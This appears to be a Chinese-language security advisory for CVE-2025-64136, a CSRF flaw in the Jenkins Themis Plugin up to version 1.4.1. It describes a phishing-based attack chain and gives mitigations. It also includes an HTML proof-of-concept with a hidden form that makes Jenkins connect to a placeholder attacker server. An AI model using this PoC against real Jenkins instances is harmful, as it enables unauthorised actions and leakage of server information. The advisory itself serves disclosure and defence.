CVE-2025-64136 Jenkins Themis Plugin跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-64136

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Jenkins Themis Plugin 1.4.1及更早版本

漏洞概述

CVE-2025-64136是Jenkins Themis Plugin中的一个跨站请求伪造（CSRF）漏洞。该漏洞存在于Jenkins Themis Plugin 1.4.1及所有更早版本中。攻击者可以通过构造恶意的HTML页面或链接，诱使Jenkins管理员在已登录状态下访问该页面。由于Jenkins Themis Plugin在处理某些请求时缺少必要的CSRF token验证，攻击者可以借助管理员的认证会话来执行未经授权的操作。具体而言，攻击者可以利用此漏洞诱导Jenkins Themis Plugin连接到攻击者控制的HTTP服务器，从而实现信息窃取、进一步攻击或内网探测等恶意目的。该漏洞的CVSS评分为4.3，属于中等严重程度，主要影响需要用户交互的攻击场景。Jenkins作为最流行的开源自动化服务器之一，被广泛应用于持续集成和持续部署（CI/CD）流程中，因此该漏洞可能影响大量使用Jenkins Themis Plugin进行测试报告管理的用户。建议受影响的用户及时更新到最新版本或采取相应的缓解措施，以防止潜在的安全风险。

技术细节

Jenkins Themis Plugin 1.4.1及更早版本存在CSRF漏洞，根源在于插件的某些功能端点缺少CSRF token（crumb）验证机制。攻击者利用此漏洞可以构造恶意请求，诱骗已登录的Jenkins管理员在不知情的情况下向Jenkins服务器发送请求。具体攻击过程如下：攻击者首先创建一个包含恶意表单的HTML页面，该表单会自动提交到Jenkins Themis Plugin的受影响的端点（通常与HTTP服务器连接配置相关）。表单中的参数指向攻击者控制的恶意HTTP服务器地址。当Jenkins管理员访问该恶意页面时，浏览器会自动携带管理员的Jenkins会话cookie向目标Jenkins服务器发送请求。由于Jenkins Themis Plugin的该端点未正确验证CSRF token，请求被成功执行，导致Jenkins Themis Plugin连接到攻击者指定的HTTP服务器。攻击者可以在其控制的服务器上记录来自Jenkins的连接请求，获取敏感信息如Jenkins环境变量、插件配置信息，甚至可以尝试进行进一步的内网渗透。此漏洞的利用条件相对宽松，不需要高权限，但需要管理员进行某种形式的用户交互（如点击链接或访问特定页面），符合CVSS向量中UI:R（需要用户交互）和PR:N（不需要权限）的要求。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标环境，确认目标使用Jenkins Themis Plugin 1.4.1或更早版本

STEP 2

步骤2: 构造恶意页面

攻击者创建包含恶意表单的HTML页面，表单指向Jenkins Themis Plugin的受影响端点，参数值为攻击者控制的HTTP服务器地址

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、即时通讯或其他方式诱导Jenkins管理员访问恶意HTML页面

STEP 4

步骤4: 自动提交请求

当管理员访问恶意页面时，浏览器自动携带Jenkins会话cookie向目标Jenkins服务器发送POST请求

STEP 5

步骤5: 漏洞利用

由于Jenkins Themis Plugin缺少CSRF token验证，请求被成功执行，插件连接到攻击者指定的HTTP服务器

STEP 6

步骤6: 数据窃取/进一步攻击

攻击者在控制的HTTP服务器上收集来自Jenkins的连接信息，可能用于内网探测或窃取敏感配置信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-64136 CSRF PoC for Jenkins Themis Plugin -->
<!-- This PoC demonstrates the CSRF vulnerability in Jenkins Themis Plugin <= 1.4.1 -->
<!-- Attacker can trick Jenkins admin to connect to attacker-controlled HTTP server -->
<!DOCTYPE html>
<html>
<head>
    <title>Jenkins Themis Plugin CSRF PoC</title>
    <style>
        body { font-family: Arial, sans-serif; padding: 20px; }
        .malicious-form { display: none; }
        .info { background: #f0f0f0; padding: 10px; margin: 10px 0; }
    </style>
</head>
<body>
    <h2>Jenkins Themis Plugin CSRF Vulnerability PoC</h2>
    <div class="info">
        <p><strong>CVE:</strong> CVE-2025-64136</p>
        <p><strong>Affected:</strong> Jenkins Themis Plugin <= 1.4.1</p>
        <p><strong>Impact:</strong> Attackers can force Jenkins to connect to attacker-specified HTTP server</p>
    </div>
    
    <p>Click the button below to trigger the CSRF attack:</p>
    <button onclick="document.forms[0].submit()">Submit Request</button>
    
    <!-- 
        This form simulates the CSRF attack.
        Replace JENKINS_URL with the target Jenkins server URL.
        Replace ATTACKER_SERVER with your controlled HTTP server.
    -->
    <form class="malicious-form" 
          action="JENKINS_URL/plugin/themis/connect" 
          method="POST" 
          name="csrf_form">
        <!-- CSRF vulnerable parameter - server URL controlled by attacker -->
        <input type="hidden" name="serverUrl" value="ATTACKER_SERVER">
        <input type="hidden" name="port" value="8080">
        <input type="hidden" name="path" value="/test">
    </form>
    
    <script>
        // Auto-submit on page load (optional, remove for manual testing)
        // window.onload = function() { document.forms[0].submit(); };
        
        console.log('CSRF PoC loaded. Submit the form to trigger the vulnerability.');
    </script>
</body>
</html>

影响范围

Jenkins Themis Plugin <= 1.4.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Jenkins全局安全配置中确保CSRF Protection已启用；2) 限制Jenkins Themis Plugin的使用权限，仅授权必要的管理员访问；3) 提醒管理员不要点击来源不明的链接；4) 使用网络防火墙限制Jenkins服务器的外出连接，仅允许必要的白名单域名；5) 考虑暂时禁用Jenkins Themis Plugin直到完成升级。